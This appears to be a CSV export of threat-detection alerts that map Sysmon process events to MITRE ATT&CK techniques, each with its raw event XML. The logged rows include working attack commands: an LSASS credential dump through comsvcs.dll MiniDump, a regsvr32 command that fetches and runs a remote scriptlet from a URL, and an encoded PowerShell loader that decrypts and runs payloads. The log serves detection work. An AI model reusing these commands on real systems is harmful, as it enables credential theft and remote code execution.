<Data Name=""ParentProcessGuid"">747F3D96-1C70-5D69-0000-0010D4551F00</Data>
<Data Name=""ParentProcessId"">1144</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1567169648.396724,2019-08-30T16:54:08.396724+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-08-30T12:54:08.354049Z"">
</TimeCreated>
<EventRecordID>32154</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3292"" ThreadID=""928"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-08-30 12:54:08.331</Data>
<Data Name=""ProcessGuid"">747F3D96-1C70-5D69-0000-0010C9661F00</Data>
<Data Name=""ProcessId"">2888</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-1B6A-5D69-0000-0020E5810E00</Data>
<Data Name=""LogonId"">0xe81e5</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-1C70-5D69-0000-0010D4551F00</Data>
<Data Name=""ParentProcessId"">1144</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1567169648.396724,2019-08-30T16:54:08.396724+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-08-30T12:54:08.354049Z"">
</TimeCreated>
<EventRecordID>32154</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3292"" ThreadID=""928"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-08-30 12:54:08.331</Data>
<Data Name=""ProcessGuid"">747F3D96-1C70-5D69-0000-0010C9661F00</Data>
<Data Name=""ProcessId"">2888</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-1B6A-5D69-0000-0020E5810E00</Data>
<Data Name=""LogonId"">0xe81e5</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-1C70-5D69-0000-0010D4551F00</Data>
<Data Name=""ParentProcessId"">1144</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1567169648.396724,2019-08-30T16:54:08.396724+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-08-30T12:54:08.354049Z"">
</TimeCreated>
<EventRecordID>32154</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3292"" ThreadID=""928"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-08-30 12:54:08.331</Data>
<Data Name=""ProcessGuid"">747F3D96-1C70-5D69-0000-0010C9661F00</Data>
<Data Name=""ProcessId"">2888</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-1B6A-5D69-0000-0020E5810E00</Data>
<Data Name=""LogonId"">0xe81e5</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-1C70-5D69-0000-0010D4551F00</Data>
<Data Name=""ParentProcessId"">1144</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1567169648.396724,2019-08-30T16:54:08.396724+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-08-30T12:54:08.354049Z"">
</TimeCreated>
<EventRecordID>32154</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3292"" ThreadID=""928"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-08-30 12:54:08.331</Data>
<Data Name=""ProcessGuid"">747F3D96-1C70-5D69-0000-0010C9661F00</Data>
<Data Name=""ProcessId"">2888</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-1B6A-5D69-0000-0020E5810E00</Data>
<Data Name=""LogonId"">0xe81e5</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-1C70-5D69-0000-0010D4551F00</Data>
<Data Name=""ParentProcessId"">1144</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1003.001] Credential dump Thread Open to Lsass,1601297256.206545,2020-09-28T16:47:36.206545+04:00,,Threat,Critical,Process ( C:\Windows\System32\rdrleakdiag.exe) attempted to access lsass process ( C:\Windows\System32\lsass.exe),8,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>8</EventID>
<Version>2</Version>
<Level>4</Level>
<Task>8</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-09-28T12:47:36.206545Z"">
</TimeCreated>
<EventRecordID>5227</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2848"" ThreadID=""2328"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>DESKTOP-PIU87N6</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-09-28 12:47:36.204</Data>
<Data Name=""SourceProcessGuid"">BC47D85C-DB68-5F71-0000-0010B237AB01</Data>
<Data Name=""SourceProcessId"">3352</Data>
<Data Name=""SourceImage"">C:\Windows\System32\rdrleakdiag.exe</Data>
<Data Name=""TargetProcessGuid"">BC47D85C-FAA9-5F68-0000-0010D9590000</Data>
<Data Name=""TargetProcessId"">668</Data>
<Data Name=""TargetImage"">C:\Windows\System32\lsass.exe</Data>
<Data Name=""NewThreadId"">3468</Data>
<Data Name=""StartAddress"">0x00007FF8C72C5EC0</Data>
<Data Name=""StartModule"">C:\WINDOWS\SYSTEM32\ntdll.dll</Data>
<Data Name=""StartFunction""></Data>
</EventData>
</Event>",DESKTOP-PIU87N6,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920557.190585,2019-05-27T05:29:17.190585+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list apppool &quot;ERROR ( message:Configuration error &quot; /text:processmodel.username ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T01:29:17.190585Z"">
</TimeCreated>
<EventRecordID>5883</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""324"" ThreadID=""2260"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 01:29:17.150</Data>
<Data Name=""ProcessGuid"">365ABB72-3D6D-5CEB-0000-00101760FF00</Data>
<Data Name=""ProcessId"">2104</Data>
<Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
<Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Server Command Line Admin Tool</Data>
<Data Name=""Product"">Internet Information Services</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list apppool &quot;ERROR ( message:Configuration error &quot; /text:processmodel.username</Data>
<Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
<Data Name=""LogonId"">0x82423</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
<Data Name=""ParentProcessId"">2584</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1082] System Information Discovery,1555606894.168542,2019-04-18T21:01:34.168542+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( &quot;C:\Windows\system32\whoami.exe&quot; /user) ,1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-18T17:00:09.977481Z"">
</TimeCreated>
<EventRecordID>24</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3192"" ThreadID=""3288"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">technique_id=T1033,technique_name=System Owner/User Discovery</Data>
<Data Name=""UtcTime"">2019-04-18 17:00:09.677</Data>
<Data Name=""ProcessGuid"">365ABB72-AD19-5CB8-0000-0010F4F40C00</Data>
<Data Name=""ProcessId"">3980</Data>
<Data Name=""Image"">C:\Windows\System32\whoami.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">whoami - displays logged on user information</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\whoami.exe&quot; /user</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Desktop\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-AB27-5CB8-0000-002021CA0000</Data>
<Data Name=""LogonId"">0xca21</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274</Data>
<Data Name=""ParentProcessGuid"">365ABB72-AC28-5CB8-0000-0010F3F70700</Data>
<Data Name=""ParentProcessId"">1200</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">Powershell</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[ T0000 ] Suspicious process name detected,1555606894.168542,2019-04-18T21:01:34.168542+04:00,,Threat,High,User Name : ( IEWIN7\IEUser ) with Command Line : ( &quot;C:\Windows\system32\whoami.exe&quot; /user ) contain suspicious command ( whoami.exe),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-18T17:00:09.977481Z"">
</TimeCreated>
<EventRecordID>24</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3192"" ThreadID=""3288"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">technique_id=T1033,technique_name=System Owner/User Discovery</Data>
<Data Name=""UtcTime"">2019-04-18 17:00:09.677</Data>
<Data Name=""ProcessGuid"">365ABB72-AD19-5CB8-0000-0010F4F40C00</Data>
<Data Name=""ProcessId"">3980</Data>
<Data Name=""Image"">C:\Windows\System32\whoami.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">whoami - displays logged on user information</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\whoami.exe&quot; /user</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Desktop\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-AB27-5CB8-0000-002021CA0000</Data>
<Data Name=""LogonId"">0xca21</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274</Data>
<Data Name=""ParentProcessGuid"">365ABB72-AC28-5CB8-0000-0010F3F70700</Data>
<Data Name=""ParentProcessId"">1200</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">Powershell</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1557770599.895876,2019-05-13T22:03:19.895876+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\regsvr32.exe) with commandline ( /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-13T18:03:19.681478Z"">
</TimeCreated>
<EventRecordID>17287</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""276"" ThreadID=""1000"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-13 18:03:19.497</Data>
<Data Name=""ProcessGuid"">365ABB72-B167-5CD9-0000-001062160C00</Data>
<Data Name=""ProcessId"">2476</Data>
<Data Name=""Image"">C:\Windows\System32\regsvr32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Microsoft(C) Register Server</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">/u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-B0EC-5CD9-0000-00201D340100</Data>
<Data Name=""LogonId"">0x1341d</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583</Data>
<Data Name=""ParentProcessGuid"">365ABB72-B0EC-5CD9-0000-0010D9D20000</Data>
<Data Name=""ParentProcessId"">944</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
